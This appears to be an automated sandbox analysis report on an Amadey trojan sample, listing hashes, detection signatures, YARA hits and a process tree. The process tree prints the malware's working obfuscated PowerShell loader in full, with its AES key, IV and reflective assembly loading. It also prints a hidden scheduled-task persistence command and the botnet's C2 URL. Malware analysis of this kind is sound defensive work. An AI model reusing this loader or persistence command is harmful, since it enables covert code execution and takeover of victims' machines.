Windows
Analysis Report
jcgLYlM4dg.exe
Overview
General Information
Sample name: jcgLYlM4dg.exe (renamed because original name is a hash value)
Original sample name: 926fc8b724cc682d97cf0849c0fcbda3.exe
Analysis ID: 1428440
MD5: 926fc8b724cc682d97cf0849c0fcbda3
SHA1: 2f1555afddb43a13be489200a751698302340056
SHA256: bcd9d9e586c6d788717507307e47d2e7c85eeaa49e7766434dbeca97973f8e59
Tags: 32, Amadey, exe, trojan
Detection
Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadey's stealer DLL
Yara detected Powershell decode and execute
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- jcgLYlM4dg.exe (PID: 4324 cmdline: "C:\Users\user\Desktop\jcgLYlM4dg.exe" MD5: 926FC8B724CC682D97CF0849C0FCBDA3)
- cmd.exe (PID: 1496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6640 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 2124 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 5044 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- cmd.exe (PID: 2624 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2636 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- wscript.exe (PID: 1480 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_958.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 2716 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 576 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | |
{"C2 url": "ruspyc.top/j4Fvskd3/index.php", "Version": "4.18"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security | |
| Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | |
| Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | |
| JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security | |
| JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security | |
| JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
System Summary
Source: | Author: Thomas Patzke |